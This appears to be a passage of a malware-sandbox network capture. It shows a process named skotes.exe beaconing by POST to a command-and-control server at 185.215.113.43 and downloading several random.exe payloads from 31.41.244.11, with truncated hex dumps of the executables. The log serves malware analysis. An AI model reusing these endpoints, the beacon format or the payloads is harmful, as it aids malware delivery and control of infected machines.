Dec 22, 2024 02:16:12.043080091 CET	1236	IN	Data Raw: c8 8b 8d 54 ff ff ff 0f b7 c1 8b cf 69 c0 e5 5c 65 52 66 8b fb 2b f0 8b 85 50 ff ff ff 2a c2 d3 ee 2b 35 10 c9 67 00 8b 4d f4 d3 6d d8 89 85 50 ff ff ff a2 03 c9 67 00 a0 02 c9 67 00 89 45 b8 8b 85 64 ff ff ff 89 75 98 89 85 6c ff ff ff e9 cd 1a Data Ascii: Ti\eRf+P*+5gMmPggEdulEU9HEE\|EiEMmhEUi]gh`fEEf}LfEfMm[?<g=8g
Dec 22, 2024 02:16:12.043117046 CET	1120	IN	Data Raw: 01 45 ac 8b 85 6c ff ff ff 2d 7e 14 00 00 89 4d b8 89 85 6c ff ff ff 89 85 64 ff ff ff 0f b6 c1 8b 4d f4 2b d8 8b 45 90 03 05 3c c9 67 00 01 4d b0 2b cf 89 45 90 89 45 9c 8b 85 54 ff ff ff 89 5d e8 8b 5d fc 0f b7 c0 01 45 c0 81 c3 70 7d 00 00 66 Data Ascii: El-~MldM+E<gM+EET]]Ep}fEEUM]]f}`<;gh}iEx"j+MMM}m-MDEE MMEMM+EfM
Dec 22, 2024 02:16:12.043232918 CET	1236	IN	Data Raw: 89 7d f4 c7 45 d0 00 00 00 00 89 5d a4 89 5d fc 2b c2 c6 45 cc e5 0f b7 c0 89 45 a0 89 45 bc 8b 85 68 ff ff ff 2d 82 20 00 00 0f b7 d1 89 85 68 ff ff ff 66 8b cf 89 85 60 ff ff ff 66 8b fb b8 a0 69 00 00 c7 45 80 38 0f 8e 75 0f af d0 66 d3 ea 8b Data Ascii: }E]]+EEEh- hf`fiE8ufTUEpkEk;<DufLf,gmLfHgE(UfI'fgEXX@giEh8uU
Dec 22, 2024 02:16:12.043267965 CET	1236	IN	Data Raw: 7c ff ff ff 89 45 e0 8b 85 50 ff ff ff 0f b6 d0 8b c2 d3 6d c0 0f af 45 94 69 c0 03 68 00 00 0f b7 c0 89 45 94 89 45 88 8b 85 6c ff ff ff 03 c6 89 85 6c ff ff ff 89 85 64 ff ff ff 0f b6 85 54 ff ff ff 02 45 a8 d2 e8 88 45 a8 8b 85 68 ff ff ff 03 Data Ascii: \|EPmEihEElldTEEhU(U4h`;UEEEgm<EDNEmo\|E\|fMf}Eh+0g]\fMh`
Dec 22, 2024 02:16:12.162758112 CET	1236	IN	Data Raw: 00 b8 bc ee 00 00 8b ca 89 45 84 d3 6d c0 0f bf 8d 60 ff ff ff 8b 55 f8 d3 ee 0f b7 4d bc 89 85 70 ff ff ff 81 c1 91 12 91 9e 0f bf 45 88 0f af f0 03 ce 2b 9d 68 ff ff ff 66 8b fb 89 4d f4 89 5d a4 89 5d fc 66 89 7d ee e9 f7 07 00 00 66 3b 7d 88 Data Ascii: Em`UMpE+hfM]]f}f;}=g+H&E4ggEEExUEE,g\|Ehh`it=gEm uf+3Ef$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49785	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:18.699363947 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019800001&unit=246122658369
Dec 22, 2024 02:16:20.050513029 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49787	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:20.352312088 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:21.680917025 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:21 GMT Content-Type: application/octet-stream Content-Length: 776832 Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT Connection: keep-alive ETag: "6761482a-bda80" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
Dec 22, 2024 02:16:21.680958986 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:21.681019068 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:21.681057930 CET	1236	IN	Data Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;\|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
Dec 22, 2024 02:16:21.681097031 CET	1236	IN	Data Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44 Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w\|$ D$$WUS`K
Dec 22, 2024 02:16:21.681190968 CET	672	IN	Data Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f Data Ascii: RWhABV?VD$t$p0A^WV\|$(AA1NNOPQEAGONFA^_WV\|$(AA1NNOPQDAGONF\A^_WV\|$(AA1NNOPQDAG
Dec 22, 2024 02:16:21.681246042 CET	1236	IN	Data Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89 Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
Dec 22, 2024 02:16:21.681282997 CET	1236	IN	Data Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64 Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@\|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
Dec 22, 2024 02:16:21.681526899 CET	448	IN	Data Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1 Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
Dec 22, 2024 02:16:21.681562901 CET	1236	IN	Data Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31 Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
Dec 22, 2024 02:16:21.800932884 CET	1236	IN	Data Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78 Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49802	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:25.827198982 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019801001&unit=246122658369
Dec 22, 2024 02:16:27.157696009 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49804	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:27.292627096 CET	63	OUT	GET /files/geopoxid/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:28.617867947 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:28 GMT Content-Type: application/octet-stream Content-Length: 1861632 Last-Modified: Thu, 19 Dec 2024 20:35:58 GMT Connection: keep-alive ETag: "676483ae-1c6800" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gPI@IIA@T0h 1 H@.rsrc X@.idata 0Z@ *@\@wekcazboP/^@ttllozcv@I@@.taggant0PI"F@
Dec 22, 2024 02:16:28.617891073 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:28.617911100 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:28.618005037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:28.618022919 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:28.618040085 CET	672	IN	Data Raw: 60 d6 64 f6 50 fe 65 fd 22 2a 36 e1 00 0d c7 31 0b ae 98 c7 7f 3e 2f fd 35 77 e3 00 d6 8c dc b2 a1 41 af 59 38 49 ba 2b c7 4d 44 49 7c 5a 91 23 7f 68 10 38 a3 e4 7f 79 fc 7c b8 14 3c c5 1c e5 82 70 ee a9 a2 b4 59 8e 22 03 8d 25 6d b6 d9 37 84 dc Data Ascii: `dPe"61>/5wAY8I+MDI\|Z#h8y\|<pY"%m7ZvY^fWS1D8Gk)LCucs$pTr~@ue2jhw`Q,.,2}':bc#ne %$6EUC[8,37*m%1d;
Dec 22, 2024 02:16:28.618220091 CET	1236	IN	Data Raw: 97 3b e5 23 b5 da a7 73 07 7e 28 c8 44 1c a2 3b f8 76 9a c4 aa 4f 5c a1 af d2 b3 68 b6 50 76 ec ff b6 3c 34 c3 2e a6 05 22 5b de 53 bf 26 89 25 11 da 97 b1 7f 7a a4 07 23 82 02 ed 2c 5a b7 c6 8b 27 86 d9 2a 3e b3 00 8f 2d bc 57 78 22 4b 17 e0 ce Data Ascii: ;#s~(D;vO\hPv<4."[S&%z#,Z'*>-Wx"Ke'!s\8o4e[W!\|$}owtcry <r'UHZS^Xk#>#2RZ>->s(@91"sTv'r(K(D9Xa
Dec 22, 2024 02:16:28.618237019 CET	1236	IN	Data Raw: bd 8e 33 dd ec 7d e8 7b b5 46 3f fc ca 02 06 d9 d6 bd c9 0e f0 3d 9f 69 67 bf 00 c8 7e 33 23 c5 12 5e d6 41 ce 4b a8 cf 26 6f 27 dc b7 0b a2 de 24 51 c7 46 49 d6 af 78 8a db 9d 27 cc 20 aa f6 38 9a 03 19 6c b8 90 de bb 77 0b 28 b5 9d b7 10 bf 5b Data Ascii: 3}{F?=ig~3#^AK&o'$QFIx' 8lw([k4< Oi"PVmkOev}`GCMw-d:_E7bR4HKacQdZ\|fMm,&qIF.REt6qvX)jPXs( <i2~kv"-#
Dec 22, 2024 02:16:28.618252993 CET	1236	IN	Data Raw: e3 cc 1c 61 6c 9f 65 97 06 92 b1 5f 4b 49 a3 5e ff 5a 4a e7 6b 6b e2 96 65 c2 1e 78 47 9b b5 5c 3e d4 bb 51 69 7b 66 a0 50 8d ba 99 15 28 78 ab 96 b1 d8 4a 56 28 63 2e 4a ec 54 e0 a7 db ab 7b 2b a3 a3 ed 6a 91 c4 33 f2 98 10 da f3 66 20 a6 4f d6 Data Ascii: ale_KI^ZJkkexG\>Qi{fP(xJV(c.JT{+j3f Om>"d<Yc2"-(MU!x~#%f'qC#81Sx{g#8=*/x~9@0=0X=uTfs%X!;mV=x
Dec 22, 2024 02:16:28.618272066 CET	1236	IN	Data Raw: ed e2 ab d6 94 c6 9a 68 e9 00 05 3e db ad 1b 50 56 e6 f2 a0 87 96 9f 14 f9 62 ac 2b c4 2b 5d 3c 94 8b 96 11 0b 85 22 37 2c 5d 32 1a a3 8c 44 19 c1 b5 9e 10 d7 ee 27 70 19 b2 ad 5d aa c2 ca a2 22 9a 17 a8 a9 3a 37 f2 fc 40 5d 12 1f 57 20 b1 e5 50 Data Ascii: h>PVb++]<"7,]2D'p]":7@]W Pjm+-#8l!qAc:np_ZZ C`D(TkT$j+Ju@~}>kZXb-PmjxI0g{U
Dec 22, 2024 02:16:28.737962008 CET	1236	IN	Data Raw: ad 7a de d8 55 84 de ba da a8 61 9f a9 3c 3d 66 7b 5c 58 e0 6c c3 11 0c ec ac 0f fb dc 2d c9 a2 fd 92 dd e9 d3 cd ec 54 22 c0 db 50 76 1d 2d ee a7 c9 d9 1a 7a 5c a2 4b 48 a4 a3 14 82 6b d6 c3 d9 01 11 70 87 7a e9 d5 ed 79 2a 64 59 4b f6 35 95 52 Data Ascii: zUa<=f{\Xl-T"Pv-z\KHkpzy*dYK5Ry0An<cvd_gaf~+;+zb[#;#QU!)_[=tvKI9P+"a]-?[]YM&81rjzhT[)60sS;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49824	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:34.634877920 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019802001&unit=246122658369
Dec 22, 2024 02:16:35.970523119 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49830	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:36.122577906 CET	63	OUT	GET /files/zhigarko/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:37.420952082 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:37 GMT Content-Type: application/octet-stream Content-Length: 439296 Last-Modified: Sat, 21 Dec 2024 08:14:10 GMT Connection: keep-alive ETag: "676678d2-6b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PEL3dg'@0@EE8@<.textj `.rdataHJ@@.datam`,@@.rsrcl@@.relocEFn@B
Dec 22, 2024 02:16:37.421088934 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 50 ca 44 00 e8 87 8d 02 00 59 c3 cc cc cc cc 68 f0 c9 44 00 e8 77 8d 02 00 59 Data Ascii: hPDYhDwYj hEdnF/hDVYj hEtFo/hD6YjhETuFO/hpDYj h$EoF//hDYjhHEL
Dec 22, 2024 02:16:37.421122074 CET	1236	IN	Data Raw: 74 46 00 e8 0f 2f 02 00 68 30 cc 44 00 e8 d6 8c 02 00 59 c3 cc cc cc 6a 24 68 5c d0 45 00 b9 8c 6d 46 00 e8 ef 2e 02 00 68 90 cc 44 00 e8 b6 8c 02 00 59 c3 cc cc cc 6a 00 68 7b ce 45 00 b9 24 75 46 00 e8 cf 2e 02 00 68 f0 cc 44 00 e8 96 8c 02 00 Data Ascii: tF/h0DYj$h\EmF.hDYjh{E$uF.hDYjh{EuF.hPDvYjh{EoF.hDVYjh{EmFo.hD6YjhEnFO.hpDYjhE8xF/.hDY
Dec 22, 2024 02:16:37.421176910 CET	224	IN	Data Raw: cc cc cc 6a 0c 68 38 d3 45 00 b9 2c 6d 46 00 e8 2f 2a 02 00 68 d0 da 44 00 e8 f6 87 02 00 59 c3 cc cc cc 6a 0c 68 48 d3 45 00 b9 c4 6e 46 00 e8 0f 2a 02 00 68 30 db 44 00 e8 d6 87 02 00 59 c3 cc cc cc 6a 04 68 58 d3 45 00 b9 98 78 46 00 e8 ef 29 Data Ascii: jh8E,mF/hDYjhHEnFh0DYjhXExF)hDYjh`ExF)hDYjhhEuF)hPDvYjhpEwF)hDVYjhxEnFo)hD6Y
Dec 22, 2024 02:16:37.421206951 CET	1236	IN	Data Raw: cc cc cc 6a 0c 68 84 d3 45 00 b9 28 79 46 00 e8 4f 29 02 00 68 70 dd 44 00 e8 16 87 02 00 59 c3 cc cc cc 6a 0c 68 94 d3 45 00 b9 5c 6d 46 00 e8 2f 29 02 00 68 d0 dd 44 00 e8 f6 86 02 00 59 c3 cc cc cc 6a 04 68 a4 d3 45 00 b9 ec 70 46 00 e8 0f 29 Data Ascii: jhE(yFO)hpDYjhE\mF/)hDYjhEpF)h0DYjhEmF(hDYjhE$oF(hDYjhEdqF(hPDvYjhEloF(hDVYjhE xFo(
Dec 22, 2024 02:16:37.421242952 CET	1236	IN	Data Raw: 68 b0 eb 44 00 e8 56 82 02 00 59 c3 cc cc cc 6a 4c 68 e0 d5 45 00 b9 c4 71 46 00 e8 6f 24 02 00 68 10 ec 44 00 e8 36 82 02 00 59 c3 cc cc cc 6a 3c 68 30 d6 45 00 b9 a4 6d 46 00 e8 4f 24 02 00 68 70 ec 44 00 e8 16 82 02 00 59 c3 cc cc cc 6a 0c 68 Data Ascii: hDVYjLhEqFo$hD6Yj<h0EmFO$hpDYjhpEsF/$hDYjhE<rF$h0DYjhEqF#hDYjhEtF#hDYj@hE$lF#hPDvYjPh
Dec 22, 2024 02:16:37.421278000 CET	448	IN	Data Raw: 45 00 b9 b4 72 46 00 e8 af 1f 02 00 68 50 fa 44 00 e8 76 7d 02 00 59 c3 cc cc cc 6a 20 68 64 da 45 00 b9 0c 6f 46 00 e8 8f 1f 02 00 68 b0 fa 44 00 e8 56 7d 02 00 59 c3 cc cc cc 6a 0c 68 88 da 45 00 b9 e0 78 46 00 e8 6f 1f 02 00 68 10 fb 44 00 e8 Data Ascii: ErFhPDv}Yj hdEoFhDV}YjhExFohD6}YjhErFOhpD}YjhEtF/hD\|YjhE,vFh0D\|YhD\|YhD\|YhPD\|Yj@hE
Dec 22, 2024 02:16:37.421430111 CET	1236	IN	Data Raw: 7e 02 00 b8 c4 60 46 00 c7 45 f0 68 60 46 00 89 45 ec 83 65 fc 00 c7 05 c4 60 46 00 4c 16 45 00 c7 45 fc 01 00 00 00 68 3c 3a 46 00 50 68 74 60 46 00 e8 15 58 02 00 83 4d fc ff 68 06 01 45 00 e8 87 7b 02 00 83 c4 10 e8 1f 7e 02 00 c3 6a 08 b8 df Data Ascii: ~`FEh`FEe`FLEEh<:FPht`FXMhE{~jD5~\`FE`FEe\`F0EEh:FPh`FWMhE0{}h0FF^$E{YjhFjhEz,Fs_h.EzYh$E
Dec 22, 2024 02:16:37.421458960 CET	224	IN	Data Raw: cc cc cc cc cc cc cc 68 68 ce 45 00 e8 42 5d 02 00 cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 24 61 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 24 16 45 00 50 66 0f d6 01 e8 8a 84 02 00 8b 4d fc 83 Data Ascii: hhEB]U$aF3EUEVUNEQW$EPfM0E3^3p]UVWFP$EfEP>0E^]UEu]PaUEU
